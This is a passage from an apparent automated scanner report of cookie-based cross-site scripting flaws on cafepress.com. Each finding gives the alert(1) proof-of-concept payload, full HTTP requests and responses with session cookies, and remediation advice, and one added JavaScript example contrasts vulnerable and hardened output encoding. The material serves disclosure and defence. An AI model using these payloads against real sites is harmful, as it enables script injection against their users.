Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+underwear-panties
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3af</script><script>alert(1)</script>ca50a4bf9d6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and cannot be made safe by HTML entity encoding, because the HTML parser does not decode entities inside a script element. Where possible, the application should not place user data inside inline script at all: emit it in an HTML-attribute-encoded data attribute or in a script element of type application/json and have trusted script read it from the DOM. If the value must appear inside a JavaScript string literal, encode it for that context at the point of output by escaping every character outside a small safe set of letters and digits as \xHH or \uHHHH; that neutralises quotes, backslashes, the '<' and '/' that form the </script break-out, and the U+2028 and U+2029 line terminators.
Request
GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7c3af</script><script>alert(1)</script>ca50a4bf9d6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 59441
Date: Sun, 26 Dec 2010 13:47:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]... = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '7c3af</script><script>alert(1)</script>ca50a4bf9d6 '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.70. http://www.cafepress.com/+water-bottles [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+water-bottles
Issue detail
The value of the cp-v cookie is copied into a JavaScript string literal enclosed in double quotation marks. The payload 35244"-alert(1)-"6a269d15e05 was submitted in the cp-v cookie, appended to the existing cookie value, and was echoed unmodified in the application's response inside the assignment to s.eVar30. The first double quote in the payload terminates the string literal, -alert(1)- is then parsed as a subtraction whose operand is a function call, and the final double quote opens a new string that absorbs the remainder of the original literal, so the statement stays syntactically valid and alert(1) runs as the page loads. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the tainted data arrives in a cookie rather than in the URL or a request body, exploiting it against another user requires a way to set that cookie in the victim's browser. The Set-Cookie headers in the response scope these cookies to domain=cafepress.com, so script execution on any host under that domain, or a header-injection flaw that lets an attacker emit a Set-Cookie header, would provide that capability. This prerequisite is why the finding is rated Information rather than High; the reflection itself is confirmed (Confidence: Certain).
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and cannot be made safe by HTML entity encoding, because the HTML parser does not decode entities inside a script element. Where possible, the application should not place user data inside inline script at all: emit it in an HTML-attribute-encoded data attribute or in a script element of type application/json and have trusted script read it from the DOM. If the value must appear inside a JavaScript string literal, encode it for that context at the point of output by escaping every character outside a small safe set of letters and digits as \xHH or \uHHHH; that neutralises quotes, backslashes, the '<' and '/' that form the </script break-out, and the U+2028 and U+2029 line terminators.
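The encoding the remediation above calls for, as an added example (written for this edit, not code from the report or from cafepress.com; the function and variable names are assumptions): the vulnerable concatenation seen in findings 1.69 and 1.70 beside a hardened renderer, both run against the two recorded payloads.

```javascript
// Added example (not code from the XSS.CX report or from cafepress.com): the unsafe
// pattern visible in the recorded responses beside a context-aware encoder for values
// that must land inside an inline <script> block. Names are chosen for illustration.

// Vulnerable rendering: the cookie values are concatenated straight into JS string
// literals, which is what the recorded responses show.
function renderVulnerable(searchTerm, visitorId) {
  return '<script>\n' +
    "window.cafepress.tealeaf.searchTerm = '" + searchTerm + "'\n" +
    's.eVar30 = "' + visitorId + '";\n' +
    '</script>';
}

// JavaScript-string-literal encoder. Everything outside a small safe set is emitted as
// \xHH or \uHHHH, so quotes, backslashes, '<' and '/' (which together form "</script")
// and the U+2028/U+2029 line terminators cannot change the structure of the script.
function jsStringLiteral(value, quote = '"') {
  let out = quote;
  for (const ch of String(value)) {           // iterates by code point, not UTF-16 unit
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9 ,._-]$/.test(ch)) out += ch;
    else if (cp < 0x100) out += '\\x' + cp.toString(16).padStart(2, '0');
    else if (cp < 0x10000) out += '\\u' + cp.toString(16).padStart(4, '0');
    else out += '\\u{' + cp.toString(16) + '}';
  }
  return out + quote;
}

// Hardened rendering: same markup, but every untrusted value goes through the encoder.
function renderHardened(searchTerm, visitorId) {
  return '<script>\n' +
    'window.cafepress.tealeaf.searchTerm = ' + jsStringLiteral(searchTerm, "'") + '\n' +
    's.eVar30 = ' + jsStringLiteral(visitorId) + ';\n' +
    '</script>';
}

// Lets the JS parser read a literal back, to show the encoding is lossless. This is a
// test aid only: never evaluate strings from an untrusted source this way.
function decodeLiteral(literal) {
  return new Function('return ' + literal + ';')();
}

// Number of "</script" sequences: the HTML tokenizer ends a script element at each one.
function countScriptClosers(html) {
  return html.split(/<\/script/i).length - 1;
}

// The two payload shapes recorded in findings 1.69 and 1.70.
const CP_ST_PAYLOAD = '7c3af</script><script>alert(1)</script>ca50a4bf9d6';
const CP_V_PAYLOAD = '35244"-alert(1)-"6a269d15e05';

console.log(renderVulnerable(CP_ST_PAYLOAD, CP_V_PAYLOAD));
console.log(renderHardened(CP_ST_PAYLOAD, CP_V_PAYLOAD));
console.log('closers, vulnerable:', countScriptClosers(renderVulnerable(CP_ST_PAYLOAD, CP_V_PAYLOAD)));
console.log('closers, hardened:  ', countScriptClosers(renderHardened(CP_ST_PAYLOAD, CP_V_PAYLOAD)));
```

Run with node: the vulnerable output contains three </script sequences and the literal text alert(1), the hardened output contains one and none, while decodeLiteral shows the browser still receives the original cookie value unchanged. Moving the value out of inline script into a data attribute or an application/json script element is an equally valid fix; whichever route is taken, the encoding belongs at the point of output, not where the cookie is read, so that a later change in where the value is used does not silently reopen the issue.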
Request
GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 61013
Date: Sun, 26 Dec 2010 13:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.71. http://www.cafepress.com/+water-bottles [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+water-bottles
Issue detail
The value of the cp_st cookie is copied into a JavaScript string literal enclosed in single quotation marks. The payload c2b6f</script><script>alert(1)</script>6386f2e7ab was submitted in the cp_st cookie and was echoed unmodified in the application's response. The payload does not need to terminate the single-quoted string: the HTML parser ends a script element at the first </script sequence it sees, whatever the JavaScript string state, so the injected <script>alert(1)</script> becomes a new script element that the browser executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the tainted data arrives in a cookie rather than in the URL or a request body, exploiting it against another user requires a way to set that cookie in the victim's browser. The Set-Cookie headers in the response scope these cookies to domain=cafepress.com, so script execution on any host under that domain, or a header-injection flaw that lets an attacker emit a Set-Cookie header, would provide that capability. This prerequisite is why the finding is rated Information rather than High; the reflection itself is confirmed (Confidence: Certain).
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and cannot be made safe by HTML entity encoding, because the HTML parser does not decode entities inside a script element. Where possible, the application should not place user data inside inline script at all: emit it in an HTML-attribute-encoded data attribute or in a script element of type application/json and have trusted script read it from the DOM. If the value must appear inside a JavaScript string literal, encode it for that context at the point of output by escaping every character outside a small safe set of letters and digits as \xHH or \uHHHH; that neutralises quotes, backslashes, the '<' and '/' that form the </script break-out, and the U+2028 and U+2029 line terminators.
Request
GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c2b6f</script><script>alert(1)</script>6386f2e7ab ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 61029
Date: Sun, 26 Dec 2010 13:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]... = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'c2b6f</script><script>alert(1)</script>6386f2e7ab '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+womens-tank-tops
Issue detail
The value of the cp-v cookie is copied into a JavaScript string literal enclosed in double quotation marks. The payload ec3ed"-alert(1)-"6cdf0b2af4a was submitted in the cp-v cookie, appended to the existing cookie value, and was echoed unmodified in the application's response inside the assignment to s.eVar30. The first double quote in the payload terminates the string literal, -alert(1)- is then parsed as a subtraction whose operand is a function call, and the final double quote opens a new string that absorbs the remainder of the original literal, so the statement stays syntactically valid and alert(1) runs as the page loads. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the tainted data arrives in a cookie rather than in the URL or a request body, exploiting it against another user requires a way to set that cookie in the victim's browser. The Set-Cookie headers in the response scope these cookies to domain=cafepress.com, so script execution on any host under that domain, or a header-injection flaw that lets an attacker emit a Set-Cookie header, would provide that capability. This prerequisite is why the finding is rated Information rather than High; the reflection itself is confirmed (Confidence: Certain).
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and cannot be made safe by HTML entity encoding, because the HTML parser does not decode entities inside a script element. Where possible, the application should not place user data inside inline script at all: emit it in an HTML-attribute-encoded data attribute or in a script element of type application/json and have trusted script read it from the DOM. If the value must appear inside a JavaScript string literal, encode it for that context at the point of output by escaping every character outside a small safe set of letters and digits as \xHH or \uHHHH; that neutralises quotes, backslashes, the '<' and '/' that form the </script break-out, and the U+2028 and U+2029 line terminators.
Request
GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 61745
Date: Sun, 26 Dec 2010 13:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+womens-tank-tops
Issue detail
The value of the cp_st cookie is copied into a JavaScript string literal enclosed in single quotation marks. The payload ae66d</script><script>alert(1)</script>eabb41eb2b2 was submitted in the cp_st cookie and was echoed unmodified in the application's response. The payload does not need to terminate the single-quoted string: the HTML parser ends a script element at the first </script sequence it sees, whatever the JavaScript string state, so the injected <script>alert(1)</script> becomes a new script element that the browser executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the tainted data arrives in a cookie rather than in the URL or a request body, exploiting it against another user requires a way to set that cookie in the victim's browser. The Set-Cookie headers in the response scope these cookies to domain=cafepress.com, so script execution on any host under that domain, or a header-injection flaw that lets an attacker emit a Set-Cookie header, would provide that capability. This prerequisite is why the finding is rated Information rather than High; the reflection itself is confirmed (Confidence: Certain).
Remediation detail
